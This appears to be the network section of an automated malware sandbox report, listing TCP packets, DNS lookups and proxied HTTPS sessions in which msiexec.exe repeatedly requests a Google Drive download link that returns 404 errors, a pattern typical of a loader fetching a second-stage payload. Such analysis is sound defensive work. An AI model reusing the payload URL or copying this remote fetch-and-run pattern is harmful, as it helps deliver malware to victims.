                                                      Jan 11, 2025 03:17:37.646089077 CET44349988142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:37.646178007 CET49988443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:37.646228075 CET44349988142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:37.646289110 CET49988443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:37.646337032 CET49988443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:37.646392107 CET44349988142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:37.646441936 CET44349988142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:37.646471977 CET49988443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:37.646509886 CET49988443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:37.661941051 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:37.661983013 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:37.662058115 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:37.662282944 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:37.662298918 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.321058035 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.321132898 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.344396114 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.344405890 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.344547033 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.344553947 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.732800961 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.732950926 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.732970953 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.732992887 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.733020067 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.733028889 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.733041048 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.733088970 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.733094931 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.733150959 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.733155966 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.733203888 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.733632088 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.733648062 CET44349989142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:38.733658075 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:38.733696938 CET49989443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:48.764477015 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:48.764573097 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:48.764688015 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:48.764918089 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:48.764941931 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:49.397126913 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:49.397258997 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:49.397732973 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:49.397741079 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:49.397891045 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:49.397896051 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:49.782810926 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:49.782886028 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:49.782900095 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:49.782949924 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:49.796216011 CET49990443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:17:49.796233892 CET44349990142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:17:49.880556107 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:49.880609035 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:49.880714893 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:49.881050110 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:49.881062984 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:50.529814959 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:50.529897928 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:50.530338049 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:50.530345917 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:50.530473948 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:50.530483961 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:50.942326069 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:50.942393064 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:50.942461014 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:17:50.942459106 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:50.942459106 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:50.942528963 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:50.943291903 CET49991443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:17:50.943320990 CET44349991142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:00.967446089 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:00.967519999 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:00.967629910 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:00.967844009 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:00.967864037 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:01.618403912 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:01.618494987 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:01.618971109 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:01.618985891 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:01.619239092 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:01.619246006 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:02.013448954 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:02.013547897 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:02.013591051 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:02.013641119 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:02.013649940 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:02.013678074 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:02.013695002 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:02.013722897 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:02.013792992 CET49992443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:02.013808966 CET44349992142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:02.025403023 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:02.025439978 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:02.025506020 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:02.025708914 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:02.025718927 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:02.652488947 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:02.652544975 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:02.652942896 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:02.652951956 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:02.653093100 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:02.653098106 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:03.057857990 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:03.057924032 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:03.057991028 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:03.058036089 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:03.058053017 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:03.058182955 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:03.058969021 CET49993443192.168.2.5142.250.181.225
                                                      Jan 11, 2025 03:18:03.058989048 CET44349993142.250.181.225192.168.2.5
                                                      Jan 11, 2025 03:18:13.077275991 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:13.077331066 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:13.077438116 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:13.077781916 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:13.077797890 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:13.768066883 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:13.768230915 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:13.768933058 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:13.768946886 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:13.769094944 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:13.769115925 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:14.157228947 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:14.157327890 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:14.157366991 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:14.157426119 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:14.158299923 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:14.158354998 CET49994443192.168.2.5142.250.185.110
                                                      Jan 11, 2025 03:18:14.158400059 CET44349994142.250.185.110192.168.2.5
                                                      Jan 11, 2025 03:18:14.158456087 CET49994443192.168.2.5142.250.185.110

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 11, 2025 03:16:23.211277008 CET5592453192.168.2.51.1.1.1
                                                      Jan 11, 2025 03:16:23.217915058 CET53559241.1.1.1192.168.2.5
                                                      Jan 11, 2025 03:16:24.580043077 CET5297053192.168.2.51.1.1.1
                                                      Jan 11, 2025 03:16:24.587332010 CET53529701.1.1.1192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jan 11, 2025 03:16:23.211277008 CET192.168.2.51.1.1.10xa51bStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                      Jan 11, 2025 03:16:24.580043077 CET192.168.2.51.1.1.10xa649Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jan 11, 2025 03:16:23.217915058 CET1.1.1.1192.168.2.50xa51bNo error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                      Jan 11, 2025 03:16:24.587332010 CET1.1.1.1192.168.2.50xa649No error (0)drive.usercontent.google.com142.250.181.225A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • drive.google.com
                                                      • drive.usercontent.google.com

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.549975142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:16:24 UTC216OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2025-01-11 02:16:24 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:16:24 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-DBlZWACLYLkys07Ft3SqKg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.549976142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:16:25 UTC258OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2025-01-11 02:16:25 UTC2219INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSysRu5KF3RVhiRXum-nfitiOdkd_DC9DlgriVCB05EkAQ5SrmycMYxvWgxD73El7Ot
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:16:25 GMT
                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-8eseIcruGEYXAuyAZLR0Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Set-Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF; expires=Sun, 13-Jul-2025 02:16:25 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:16:25 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 77 53 6d 57 39 63 49 4b 71 61 59 31 4a 45 74 4e 4d 2d 66 47 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="KwSmW9cIKqaY1JEtNM-fGA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.549978142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:16:36 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:16:36 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:16:36 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-K6yhVEF-bQZxkesvVow8Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.549979142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:16:37 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:16:37 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRvT9mHj3kKh3yOo4ARF13a2rl1FrFMmtg7OiCptatpD_Q9e18m4Z0l6gjLkz28AlV8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:16:37 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-GYrO8KJLBtnt-XWml0kUSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:16:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6e 64 72 6a 6d 69 71 4b 66 79 39 78 7a 7a 51 67 6c 6d 6b 50 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UndrjmiqKfy9xzzQglmkPQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.549980142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:16:48 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:16:48 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:16:48 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
